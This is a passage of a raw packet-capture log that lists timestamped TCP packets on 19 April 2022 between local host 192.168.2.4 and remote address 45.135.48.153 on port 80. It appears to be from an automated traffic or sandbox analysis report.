Apr 19, 2022 16:44:44.463676929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.463767052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463812113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.463886023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463978052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464083910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464126110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.464246035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464279890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464284897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.464396954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464548111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464591980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.464644909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464684010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.464756966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.464916945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465004921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465049028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.465126038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465166092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.465244055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465497971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465553999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465572119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465598106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.465635061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.465715885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465780020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.465822935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.465898037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466001034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466171980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466219902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.466232061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466270924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.466325998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466476917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466579914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466620922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.466723919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466763973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.466808081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.466886997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467046022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467094898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.467168093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467210054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.467268944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467370033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467487097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467546940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.467603922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467675924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.467736006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467858076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467925072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.467976093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.468027115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468075037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.468156099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468283892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468381882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468436003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.468532085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468585968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.468640089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468733072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468854904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.468910933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.469006062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469055891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.469099998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469214916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469326973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469396114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469398975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.469438076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.469547987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469605923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469727993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469742060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.469887972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.469990969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470041990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.470072985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470118046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.470251083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470325947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470417023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470467091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.470551968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470603943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.470699072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470753908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470869064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.470917940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.471033096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471079111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.471138000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471196890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471365929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471411943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.471442938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471487045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.471565008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471683979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471807957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471851110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.471884012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.471929073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.472043991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472130060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472225904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472270012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.472323895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472367048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.472486973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472559929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472721100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472765923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.472810984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.472855091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.472934008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473006010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473165035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473211050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.473254919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473298073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.473373890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473488092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473572969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473617077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.473717928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473813057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473865032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.473918915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.473962069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.474052906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474179029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474282026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474333048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.474381924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474425077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.474520922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474606991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474726915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474770069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.474817038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.474858999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.474957943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475066900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475198030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475241899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.475287914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475327015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.475398064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475543022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475641012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475692987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.475769043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475815058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.475848913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.475970030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476104975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476147890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.476182938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476223946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.476377010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476474047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476558924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476603031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.476680994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476722956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.476803064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.476910114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477037907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477082014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.477116108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477157116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.477246046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477327108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477432013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477473021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.477544069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477586031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.477684975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477781057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.477824926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.477894068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478038073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478133917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478177071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.478244066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478286028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.478359938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478451014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478552103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478593111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.478693008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478737116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.478813887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.478924036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479044914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479091883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.479136944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479178905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.479254007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479346037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479484081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479532957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.479649067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479692936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.479723930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479834080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479928017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.479986906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.480078936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480120897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.480201006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480271101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480395079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480438948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.480503082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480542898 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.480638981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480729103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480849028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.480895996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.480973959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481019020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.481053114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481205940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481286049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481328964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.481447935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481489897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.481595039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481650114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481750011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481794119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.481837988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.481880903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.481970072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482120991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482218981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482263088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.482312918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482352972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.482415915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482541084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482635021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482677937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.482800007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.482847929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.482889891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483004093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483092070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483131886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.483210087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483251095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.483340025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483428001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483566999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483608007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.483675957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483716965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.483799934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.483897924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484009981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484052896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.484139919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484240055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484286070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.484364986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484411001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.484455109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484572887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484647989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.484699011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484850883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.484909058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.484942913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485029936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485141039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485188961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.485291004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485331059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.485362053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485480070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485588074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485630035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.485732079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485830069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485871077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.485915899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.485954046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.486051083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486176968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486313105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486356020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.486387968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486429930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.486502886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486632109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486793041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486840010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.486911058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.486957073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.487015963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487220049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487238884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487292051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.487329960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487375021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.487498045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487602949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487679958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487725019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.487807989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.487860918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.487903118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488001108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488080978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488126993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.488204956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488245964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.488312006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488436937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488557100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488599062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.488712072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.488751888 CEST	49758	80	192.168.2.4	45.135.48.153
